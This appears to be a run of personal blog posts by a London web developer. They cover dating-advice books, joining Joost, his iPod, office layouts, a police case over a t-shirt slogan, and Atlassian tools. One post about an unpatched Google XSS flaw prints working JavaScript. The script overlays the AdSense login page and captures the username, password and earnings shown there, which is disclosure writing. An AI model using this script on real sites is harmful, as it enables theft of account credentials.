Jibbering Musings

It’s new years - actually it’s a long time after, but that’s just my slowness at writing blogposts - and people are always reflecting on their lives, and wanting to reflect on yours too. I mentioned to a friend of mine that at the end of The Game there was the intro to another book by Neil Strauss The Rules of the Game. This book promised to help you “Get a date in thirty days”, my friend instantly went “what’s your address, I’ll buy it for you!”

So when your friends think that you need that much help, you have to take it seriously. I started thinking about some of the other comments my female friends had said “you’re slightly clammy”, “just dress in an updated way and get a modern hair cut and you’re good”, “you can do alright with girls with a bit of confidence, even you!”. Of course this last advice is what really matters, confidence is key.

So I figured with that much “encouragement” from my friends, maybe I should have a look at the book, with a borders 40 yards from the front door, I bought it, and started looking what I had to do to get a date. Unfortunately it really was even more depressing than the game. Day ones main mission was “operation small talk”, the idea being to make small talk to five people, people suggested were a homeless person or an old lady in the supermarket queue. Day two was do the same, but remember the eye colour to make sure you look people in the eye as you talk.

Day four has the radical idea that showering, shampooing, smelling nice, shaving or grooming your beard, wearing clean well fitting clothes can help you attract someone. Now I realise this is all important advice, but I’m wondering if the sort of people who need this advice really need to get a date more importantly than say some friends or a basic course in social interaction.

On reaching Day 7, you’re given a big, big reminder to not read on ahead, and how important it is to just read one day at a time. Now this is a bog standard psychological trick to get people to buy in and invest in doing it - maybe that’s a good thing if you’re the sort of guy who needs to be told not smelling of 2 week old stale sweat will help you get a date, but I’m just not trusting enough to do that, so I read on.

The build up is all to day 30, where you have to plan a dinner party to invite the “date” you manage to get to come to, in a “I’m having a few friends over for dinner, why don’t you come along too.” It doesn’t have to be at your place, you could just be at a restaurant with a group of friends. My problem with this again is at one point it’s pitched at people who don’t have friends to tell them that they smell, but at another point they have enough friends to get round and impress a date with how interesting and worthy of dating the guy is at a dinner party.

Now I enjoy cooking for people, can manage not to poison them, have a pretty okay flat to host a dinner party in, so it’d be a good end for me - but again this book is pitched at people who 30 days before couldn’t look someone in the eye when paying for stuff in the supermarket, let alone carry off hosting an eight person dinner party, cooking all the food, impressing the date, and if you follow the actual subtext of the book finally getting his end away.

Maybe if I’d've followed the book rather than just read it, I could’ve believed how such a drastic transformation could’ve happened, but at the minute, I just can’t buy it. I don’t doubt that following the exercises would’ve improved the chances of anyone doing it - as my friend said above most important thing is confidence, both to try and that you will succeed, following the exercises will probably help fake that confidence. I can’t really believe it will actually make any fundamental difference to a persons life - of course maybe faking it a few time will give a guy the confidence to not need to next time.

I think better advice for the guy I feel the book is targetted at could be had from Dan Savage who was actually targetting it at 15 year old boys, but I think that’s really who the book is talking to, guys who never made it past their awkward/repulsive phase.

“But don’t despair, TGTW. Your awkward/repulsive stage will pass. In the meantime here’s what you need to do: Worry less about getting your 15-year-old self laid and start thinking about getting your 18- or 20-year-old self laid. Join a gym and get yourself a body that girls will find irresistible; read so that you’ll have something to say to girls (the best way to make girls think you’re interesting is to actually be interesting); and get out of the house and do shit–political shit, sporty shit, arty shit–so that you’ll meet different kinds of girls in different kinds of settings and become comfortable talking with them.”

Substitute however old you are in the above, but if you’re really that inept that you need to be told to shower, work on a few year plan, and not a 30 day one.

So unfortunately my original plan of following the book, maybe even blogging about it as I went has gone out of the window, not simply because I got a date - I got one of those from a girl on the train on the way back from convincing a friend of mine to do the book aswell. The plan really got knocked on the head after a date I had led to something more - it wasn’t a dinner party date though - more of a run - although the next night…

The other day I took a flight to New York, due to the non-arrival of the fast bus, I didn’t have much time after the rush hour slow bus to the airpor. So I didn’t have time to do the important things, like shower, eat breakfast, buy books for the flight and check email. There wasn’t much choice in the easy quick grab book sections that I’d not already read - either people aren’t writing enough, or I’m flying too much and buying too many books, but I ended up picking up The Game by Neil Strauss.

Geeks seem very popular in the media at the minute, we have The Big Bang Theory, The IT Crowd and of course all the reality shows like The Pick Up Artist, which I found ‘cos it appears on Joost, which has characters from the book in.

The Game is pretty much a book about the obsessiveness of the geek mind, and what goes wrong when the nerdy thought processes get re-routed into trying to pick up girls. Other than Neil Strauss himself, all the other major characters are from a very computer geek background - they all started in the early days of the internet.

It turns out that geeks try and pick up women in much the same way as they code, learning simple routines by memory and cobbling them together into something larger. They also seem to suffer many the same problems as they do with programming projects - they get increasingly obsessed with the art and the process and lose the actual aim of it. So like with projects that never get complete because some developers try and perfect a pretty irrelevant routine that was working fine rather than actually complete the project. So the geeks go out and “number close” or even “kiss close” a girl, but never actually go out with a girl, or spend time with them - which to me is kind of not the point of being a pick up artist, but maybe I’ve missed the point.

As a single shy “engineer” reading about the ideas and techniques has made me think about why not start try out the ideas from the pick up artist community, unfortunately there were two problems with this, one the work involved really seemed to be quite a lot, but much more importantly you have to do it without drinking and there really seems silly. So I think I’ll stick with the traditional English fallback of getting really, really drunk, and hoping something happens - I mean it wouldn’t be traditional if it didn’t work sometimes right?

Following on in my continued development into a regular guy this year, where I started doing all the normal things people do like not being homeless and buying iPod’s. Last week I got a regular job, and I’m happy to say that I am now a junior developer at Joost. It’s not been a secret I’ve been working with the folk at Joost for a fair old time now, but now it’s a proper thing, with holidays, HR rules, and a salary at the end of the month.

It’s been an interesting time watching Joost grow from a few crazed people meeting in random London hotels, and working sitting on top of shredders into a company with now a 100 people working in proper offices. I’ve had a lot of fun in both phases though, and am surprisingly happy to have now entered my new corporate life. Hopefully I can work my way up from the Junior Developer role into something with more influence, but there’s a lot of good people at Joost to elbow out of the way on the way up the corprorate ladder so it might take awhile. Of course 100 people isn’t actually very corporate, and neither is Joost and I’m probably still able to say that I’ve drunk beer with all of the Joost folk bar except a very, very select people (*). In fact, I owe lots of them beer still, due to a mistake I made in a Joost easter egg.

Of course the best thing about working at Joost isn’t the bright people, it isn’t even the technology we work with, it’s not even the cool Joost towels we have to brand our bathrooms with at home (I checked, we have to, it’s in the contract.) but it’s the content. Working on Joost, means I get to watch a lot of TV, especially as I work from home, and have always worked with television on in the background. So in a spirit of eating our own dogfood I watch Joost almost all the time (Other than on sunday afternoons, when I’m kind of obsessed by “Come dine with me” at the moment).

I’ve found that there is actually a lot of good stuff to watch, there’s the big brand stuff, [pick some], but actually that has attracted me less than the other stuff that I might not normally have tripped over on regular TV. There’s all sorts of good short movies, such as No, No, No, or other Movieola short films, even Bad Yogurt on TVBOMB is good in a particularly disgusting kind of way. Superdeluxe was something I’d probably never see normally which was good when I was in the US the other week, and the nostalgia hit from stuff like Full House and Duckula are also always a worthwhile diversion. And The Onion is perhaps now my favourite channel for its in depth news reporting, that seems subtly different in a way I can’t quite grasp from what I’m getting from my regular Economist reading.

I actually end up watching a lot of music videos, as the continuous starting/stopping of Joost as I try to fix some bugs or add some features, makes the longer stuff harder to get into - of course, even some of these can be distracting. In some ways it would be good to return to the days when all we had to watch on Joost were the Giant Sleepy Sharks.

(*) I guess the missing ones just don’t like me much, or maybe are just too hard working.

It’s strange how often Richard Herring’s life seems to resonate with me - you wouldn’t've thought the life of a slightly overweight 40 year old stand up comic from the West Country living in west london would often resonate as I’m only 33, and could never stand up in front of any one, but it does.

Today Richard ruminates on social networking, (that’s real social networking, not the sort of thing you do on facebook or linkedin) and:

Sometimes if I am full to the brim with alcohol I can overcome the shyness part of the equation, but given my state of inebriation I will usually say or do something that would have a detrimental effect on my employment or social status.

Of course it’s not really too bad for me, as I neither get invited to the sort of parties that have important industry people hanging around in them (or indeed any parties if I’m completely honest with myself) and unlike the Media world, being a geek is actually much more of a meritocracy. Although I’m still sure the people who spend their time writing lots to get themselves known end up doing better than those who quitely get on with things and just get them done. Good job the internet made that possible for us wall flowers.

It’s been a bloody long time since I’ve blogged anything, so long that now the endless “sell me your blog to let me turn it into a link farm on the page rank” remind me of how long since I last updated it, it’s been surprising, nothing has annoyed me enough to write anything, at least nothing on stuff I can blog about anyway.

I’ve had a pretty good last year money-wise, as I’ve actually done some work, and with that I’m no longer homeless, so if you need a place to stay in south-west London, drop me a line. In fact, things have been so good I’ve even splashed out on luxuries and bought an iPod nano - my first ever iPod, for something that is supposed to be the ultimate in consumer user interfaces, it’s pretty annoying.

There’s no OFF button, pause and rely on it the auto-off behaviour, that’s strange, stop it and shut up is extremely important functionality for me, but not something the nano supports.

There’s no auto-lock, that I just can’t understand, my phone, which is the cheapest sell has it, it doesn’t need a little push switch in an inaccessible place to stop the volume changing randomly when it’s in your pocket, it just solves that for you by automatically locking.

They’re minor niggles from what is a generally good user interface, but for what is a very limited device designed to do one thing, not as impressive as I would’ve imagined from the talk. At the same time, why is the macbook asking me for the macbook password to update the nano’s firmware? If it’s for security, it should be the nano’s password you’re asking me, not a password for a completely different device, that’s just teaching me to enter my system password for nothing to do with my system, bad lesson to learn.

To complete the apple annoyances, they’ve patented the anti-theft device I talked about last time, let’s hope the bar on patent obviousness carries on raising to avoid this sort of thing.

As a homeless internet developer, I spend a lot of my time in pubs using their wifi and drinking their beer, drinking beer has a side-effect, and not just on my code quality, my bladder fills and I need to partake of the facillities, this means abandoning the laptop on the table of a strange pub in a strange town - the data’s safe, that’s encrypted - not for me the embarrassment of losing a laptop chock full of an unsecured source tree, but the machine is worth a fair bit, and it’d be bloody annoying too.

So I was thinking - T60’s and indeed all decent laptops already have an accellerometer in it, why isn’t there a program which starts shrieking “Help, Help, he’s stealing me” at full volume. Probably be really crap, but it should at least exist - people?

Of course if you do see a strange bloke sitting in a corner drinking alone yet talking to himself and imaginary people on IRC, go buy him a drink - it might be me.

The Joel production line appears to be claiming that for every programmer can only work one way, that way being in private, with no distractions, and just churning away at a task.

It appears that Joel feels programmers has no artistic parts where inspiration might be needed, he also appears to believe that every programmer has zen like orders of concentration such that they can endlessly code without a single distraction.

Now it’s common that many programmers don’t like interuptions, but not all, I’ve met a few others, generally the best ones I’m working with - perhaps that’s because I reckonise their quality because I interact more with them, or because it is related to a mind that perserveres in an enviroment where most people are not like you are the better programmers - I don’t know. I could never work in a private office, I can work in a pub, or a cafe, or on the sofa with a TV for company and the distraction, but I cannot work in a private office, or a silent open-plan office.

What happens is there aren’t the distractions to trigger inspiration, or to slow down the thought so the code actually written is the code that is in the head. Of course even without noise, the refresh email, refresh usenet, visit bloglines, check the lurking on IRC channels can be used as a distraction - but even with those, I often have to turn to spider solitaire to give the brain a break to solve the particular problem. Of course it may be even more productive to go for a jog, or a walk on the beach, but those aren’t things you can do if you’re having to work in an office - all you can do is walk to the coffee or around the office - if the office is all private rooms you can’t even do that, as you’ll never meet anyone.

Don’t make the mistake of assuming what works for you, will work for everyone, people are very different creatures! One of the big problems I have in a closed enviroment is the length of time it takes to get to know people, can I call that bloke on the team a muppet when he mistakes, or do I have to tread on eggshells around him, can I throw out an idea without people thinking me stupid and not listening next time - everyone will always have stupid ideas, but if they don’t say them they might never say their good ones. I need to get to know the team, both them, and what they’re doing, and how they write code - are they someone who checks in regularly - so there’s no point reporting that bug to them, they’ll know about it just wanted it checked in - or are they someone who checks in only when they think it’s finished so the bug needs reporting.

Writing software, or creating websites is a team activity, if everyone’s in a seperate office where’s the team? Of course teams can work remotely, there’s no need everyone be in the same office - however they then do need an IRC channel or group chat where everyone can overhear the other conversations - and have off topic conversations, otherwise the social interaction never builds up, and you can never learn to trust the other people.

Another day, another XSS flaw, this one in Google again, but this is a little more interesting than the normal ones, what this one shows is how JSON results add an extra vector to attack that might be missed by your QA team.

The problem here was that the JSON was returned with a mime-type of text/html, a browser will render that as if it was an HTML page, even if it’s really just a javascript snippet. The easiest way to protect against these is to ensure that all javascript recieved by the XMLHTTPRequest object is returned with a suitable mime-type - application/json That will mean even when you make a mistake and write un-encoded untrusted data to the document, it won’t allow people to attack your site.

The google exploit was reported here, it’s at the time of writing unpatched, unfortunately that was down to the discoverer not giving google any time to fix, whilst they have had their problems before, recently they have patched quickly, so this was not very fair, or wise. Google also appear to be taking testing their own services for security flaws more seriously, they recently had a presentation to the QA team that you can watch on Google Video.

As I’ve said before, the everything on a single domain causes problems, it means any exploit anywhere on the domain, allows you to exploit any service provided for the domain. This exploit is also present in https:// google, so to re-enforce the problem XSS can present to a user, and why XSS is not simply about cookie stealing. Here’s a simple demonstration of using the exploit to steal username and password from google adsense.

The exploit is simply used to create an IFRAME that fills the document and points it to a google adsense login, when the user logs in, the username and password are alerted - also after logging in, then the “today’s earnings” are alerted. Of course a real attacker would not alert these fields, but would sent them off to a site to be collected later. Are google adsense passwords useful? Would you notice if the address or account to get the cash changed until you’d not got the cheque?

The script code is simple, you don’t need to be clever, and phishers generally aren’t stupid, it takes brains to launder money.

document.body.innerHTML="<div><iframe src='https://www.google.com/adsense/report/overview'"+
" onload='go()' style='position:absolute;top:0;left:0;height:100%;width:100%;'></div>";

function go() {
  try {
  var win=window.frames[0];
  win.document.body.style.overflow="hidden";
  win.document.body.style.border="0px solid white";
  var doc=win.frames[0].document.forms[0];
  doc.onsubmit=function() {
   alert("Your adsense username and password are:n"+
   doc["Email"].value+'nandn'+doc["Passwd"].value);
   x=window.open(location.href);
  }
 } catch (e) {
  try {
   var win=window.frames[0];
   var doc=win.document.body;
   var x="Today's Earnings:"+doc.getElementsByTagName('h1')[0];
   alert(x.getElementsByTagName('span')[0].innerHTML.replace(" ",""));
  } catch (e) {}
 }
}

The result is clear:

Bollocks is a lovely word, flexible and not offensive at all to the majority of the British public, yet the Norfolk police think it causes “harassment, alarm and distress” if you use it as “Bollocks to Blair”. It seems to me that’s pretty clear that the Norfolk police don’t understand the law, the harassment, alarm and distress law that is punishable by an 80 pound fixed penalty notice, is the Section 5 public order act of 1986. The person is guilty of this offence if:

• (b) displays any writing, sign or other visible representation which is threatening, abusive or insulting,

Now, I suppose that you could at a push say it was insulting, but I think it would be a struggle, it’s certainly not threatening or abusive, so I’m not sure it’s an offence at all however, if it is htere are two obvious defences applicable to the words “bollocks to blair” on a t-shirt,

• (a) that he had no reason to believe that there was any person within hearing or sight who was likely to be caused harassment, alarm or distress, or
• (c) that his conduct was reasonable.
• (4) A person is guilty of an offence under section 5 only if he intends his words or behaviour, or the writing, sign or other visible representation, to be threatening, abusive or insulting, or is aware that it may be threatening, abusive or insulting or (as the case may be) he intends his behaviour to be or is aware that it may be disorderly.

Unfortunately this will never make it to court, when Tony Wright requests a court hearing, as is his right under the scheme then “the case will be reviewed by a Crown Prosecutor, applying the evidential and public interest test under the Code for Crown Prosecutors.” [PND Op guidence], and unfortunately I’m sure they’ll decide it’s not in the public interest.

We need a court case, the police are wasting too much time on ludicrous things, making simple mistakes, it’s possible to understand if not quite excuse the police making mistake when under real pressure and shooting innocent men, at least there was pressure, but what pressure is there on a policeman sitting in a Norfolk field faced with t-shirts saying “Bollocks to Blair”?

Bollocks has an interesting history in UK courts, in 1977 there was a case against against a record store and Richard Branson the Sex Pistols album http://en.wikipedia.org/wiki/Never_Mind_The_Bollocks_Here’s_The_Sex_Pistols, that case failed, probably thanks to the defence having a famous QC and Rumpole creator John Mortimer QC to help in the defence of a minor crime at a magistrates court.

Mr. Mortimer managed to sum up in that case saying the excellent

“What sort of country are we living in if a politician comes to Nottingham and speaks here to a group of people in the city centre and during his speech a heckler replies ‘bollocks’. Are we to expect this person to be incarcerated, or do we live in a country where we are proud of our Anglo Saxon language?”

[ref].

Unfortunately it’s looking increasingly like the Police do what such people to be incarcerated, and this time what famous QC’s are there that Mr Wright could call on, unfortunately I could only think of one, Cherie Booth QC, and I’m not sure she’d be up for it.

Actually, this isn’t quite what the title says, I’ve not suddenly gone crazy and used this forum for praise rather than my normal moans, but using some software recently has actually made me feel a lot better about both MediaWiki and Bugzilla, normally I’ve found them difficult to use, but with recent experience of a commercial version of these 2, I’d now positively love to use them.

Confluence and Jira

Confluence is a commercial wiki, Jira a commercial bug tracker, both are from atlassian, they say about their software:

Our software is better because:

• we value brilliant simplicity as a point of differentiation
• we think through the customer’s problems thoroughly, and come up with innovative solutions to their problems

from: http://www.atlassian.com/about/mission.jsp

I can’t really agree with those statements, I’ve had lots of problems with both products, they seem technically okay, there’s not really been many technical problems - non fatal script errors mostly, But the user interfaces are just so odd as to drive you crazy, you just can’t get anything done, one of the big problems is the obsessive use of POST everywhere, so things like a the results of a search doesn’t appear in the history, the user interface is completely inconsistent, there are two EDIT / EDIT links 20pixels apart, one edits the page, another edits tags on the page, it’s not at all clear which is which.

After annoying the poor guy who was looking after the installs I was using, raising bugs, moaning and being generally the annoying person I can be, I went to the atlassian people, which just turned up more problems, they have a link to popular issues which doesn’t list any popular issues for example (there is a list of popular issues, you can find it if you look hard enough.)

Most annoying though was trying to create an account on the official site, it complains if your username has a uppercase letter in it. I can’t understand this, it takes more effort to come up with a usable error message - not that they particularly have, than it does to simply lowercase the field - although quite why you have the restriction at all is another question. I’m not sure how requiring a particular format of username is “brilliant simplicity as a point of differentiation“